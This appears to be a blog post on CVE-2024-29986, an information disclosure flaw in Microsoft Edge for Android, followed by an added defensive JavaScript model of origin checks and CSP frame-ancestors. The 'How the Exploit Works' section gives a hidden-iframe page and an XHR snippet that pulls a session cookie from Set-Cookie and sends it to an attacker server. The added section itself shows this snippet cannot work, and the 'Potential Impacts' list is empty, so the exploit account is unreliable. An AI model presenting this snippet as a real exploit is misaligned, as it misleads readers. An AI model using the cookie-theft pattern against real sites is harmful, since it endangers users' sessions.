CVE-2024-29986 is a significant vulnerability affecting the Chromium-based Microsoft Edge browser for Android. It allows attackers to exploit an information disclosure weakness, potentially granting unauthorized access to sensitive user data. This vulnerability not only poses serious threats to user privacy but also underscores the need for constant vigilance and updates in the fast-changing cybersecurity landscape. In this post, we'll dive deep into CVE-2024-29986, the risks involved, potential impacts, and recommended mitigation actions. We'll also provide code snippets, links to original references, and a detailed look at the exploit.

References

- NVD - CVE-2024-29986: https://nvd.nist.gov/vuln/detail/CVE-2024-29986
- Microsoft Security Advisory: https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2024/29986
- Chromium Project: https://www.chromium.org/Home

Vulnerability Details

The vulnerability in question, CVE-2024-29986, exposes sensitive information to an attacker in a specific scenario: when a user visits a malicious website using the Microsoft Edge browser on Android. The vulnerability enables an attacker to bypass the Same-Origin Policy (SOP) designed to restrict web pages from accessing data loaded within another site. This could allow an attacker to access sensitive user-specific browser data, such as cookies, authorization tokens, or session information, and even alter user data in some cases.

How the Exploit Works (with code snippet)

The exploit hinges on leveraging a flaw in Microsoft Edge's handling of iframes. Here's a brief code snippet illustrating how an attacker might exploit this vulnerability:

1. Host a malicious website with the following code:

<!DOCTYPE html>
<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <title>Malicious Site</title>
</head>
<body>
  <iframe src="https://www.example.com/" id="target-iframe" width="" height="" style="visibility:hidden;"></iframe>
  <script>
    document.getElementById('target-iframe').onload = function() {
      // Exploit code goes here.
    };
  </script>
</body>
</html>

2. Craft and deploy exploit code that leverages the vulnerability, with the aim of stealing user-specific browser data:

  var xhr = new XMLHttpRequest();
  xhr.open('GET', 'https://www.example.com/'); // Target website
  xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
      var targetSessionInfo = /SessionInfo=([^;]+)/.exec(xhr.getResponseHeader('Set-Cookie'))[1]; // Extract targeted info from cookies
      sendStolenData(targetSessionInfo); // Send targeted data to attacker-controlled server
    }
  };
  xhr.send();

Potential Impacts

Users affected by this vulnerability could face a wide range of impacts, including but not limited to:

Mitigation Actions

Microsoft has acknowledged the vulnerability and released security updates to patch the flaw in Microsoft Edge for Android. Users are strongly encouraged to apply security updates in a timely fashion and always keep their browsers up to date to ensure protection from such vulnerabilities.

To mitigate the risk of this vulnerability:

1. Update Microsoft Edge for Android to the latest version. Instructions can be found on the official Microsoft website: https://support.microsoft.com/en-us/topic/update-microsoft-edge-for-android-aec07450-230e-4f25-9e7c-33c53177c3b9
2. Avoid visiting unknown or suspicious websites, and refrain from clicking on suspicious links shared via emails, messages, or social media.
3. Employ browser extensions or security software that can help detect and block potentially malicious websites and content.
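
The following is an added example, not code from the original post and not Microsoft or Chromium code. It models, from the defender's side, the checks that stand between the iframe/XHR snippet shown above and the target site's session data: the origin comparison (scheme, host, port) that the Same-Origin Policy described in the Vulnerability Details section rests on, the rule that Set-Cookie is a forbidden response header that script can never read, and a simplified evaluator for the Content-Security-Policy frame-ancestors directive that a site operator can use to refuse being embedded at all. Assumptions: the attacker origin https://attacker.example is a constructed placeholder, the frame-ancestors evaluator covers only 'none', 'self' and host sources with an optional "*." wildcard (no scheme-upgrade matching), and framing hardening is general web hygiene for the embedding scenario, not something the advisory states as a fix for CVE-2024-29986.

```javascript
// Added example (not from the original post): the browser-side and
// site-side checks relevant to the iframe/XHR scenario described above.

// Origin as the Same-Origin Policy defines it: scheme + host + port.
// The URL parser drops default ports, so u.port is '' for https://host/.
function originOf(urlString) {
  const u = new URL(urlString);
  return `${u.protocol}//${u.hostname}${u.port ? ':' + u.port : ''}`;
}

function sameOrigin(a, b) {
  return originOf(a) === originOf(b);
}

// Per the Fetch standard these response headers are never exposed to
// script, even for same-origin responses, so a regex over
// getResponseHeader('Set-Cookie') can never see a session cookie.
const FORBIDDEN_RESPONSE_HEADERS = new Set(['set-cookie', 'set-cookie2']);

function isResponseHeaderReadable(name) {
  return !FORBIDDEN_RESPONSE_HEADERS.has(name.toLowerCase());
}

// Simplified frame-ancestors evaluator (assumption: 'none', 'self' and
// host sources only; no scheme-upgrade matching). Returns whether a page
// served with cspHeader may be embedded by a frame at embedderOrigin.
function framingAllowed(cspHeader, pageUrl, embedderOrigin) {
  const directive = cspHeader
    .split(';')
    .map(s => s.trim())
    .find(s => s.startsWith('frame-ancestors'));
  if (!directive) return true; // no policy: browsers allow framing by default
  const sources = directive.split(/\s+/).slice(1);
  if (sources.includes("'none'")) return false;
  const emb = new URL(embedderOrigin);
  for (const src of sources) {
    if (src === "'self'" && sameOrigin(pageUrl, embedderOrigin)) return true;
    if (src.startsWith("'")) continue; // other keyword sources not modelled
    // host-source: [scheme://][*.]host[:port|:*]
    const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/]+)(?::(\d+|\*))?$/i.exec(src);
    if (!m) continue;
    const [, scheme, wildcard, host, port] = m;
    if (scheme && scheme.toLowerCase() !== emb.protocol.slice(0, -1)) continue;
    const hostMatch = wildcard
      ? emb.hostname.endsWith('.' + host.toLowerCase())
      : emb.hostname === host.toLowerCase();
    if (!hostMatch) continue;
    const embPort = emb.port || (emb.protocol === 'https:' ? '443' : '80');
    if (port && port !== '*' && port !== embPort) continue;
    return true;
  }
  return false;
}

// The post's scenario: an attacker page embedding the target site.
// ATTACKER_ORIGIN is a constructed placeholder; TARGET_URL is the URL
// used in the post's snippet.
const ATTACKER_ORIGIN = 'https://attacker.example';
const TARGET_URL = 'https://www.example.com/';

// Summarise what a correctly behaving browser and a hardened target site
// would decide for the snippet above, given the target's CSP header.
function evaluateScenario(targetCsp) {
  return {
    crossOrigin: !sameOrigin(ATTACKER_ORIGIN, TARGET_URL),     // SOP applies
    setCookieReadable: isResponseHeaderReadable('Set-Cookie'), // always false
    framingAllowed: framingAllowed(targetCsp, TARGET_URL, ATTACKER_ORIGIN),
  };
}

console.log(evaluateScenario("default-src 'self'; frame-ancestors 'none'"));
```

Run it with any recent Node.js. The three flags show why the snippet depends on a browser defect rather than on anything the page's JavaScript does: the request is cross-origin, Set-Cookie is unreadable regardless of origin, and a target that sends frame-ancestors 'none' (or X-Frame-Options: DENY) is never loaded into the hidden iframe in the first place. Site operators who serve session-bearing pages can apply that header independently of the browser update.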

Conclusion

The CVE-2024-29986 vulnerability serves as a stark reminder that even widely-used and generally trusted software can have its weaknesses. As users, it is our responsibility to stay informed, apply security updates diligently, and remain cautious in our online activities. By taking the recommended steps to mitigate this vulnerability, Android users of the Microsoft Edge browser can significantly reduce the risk of potential information disclosure attacks.

Timeline

Published on: 04/18/2024 19:15:11 UTC
Last modified on: 06/11/2024 15:25:23 UTC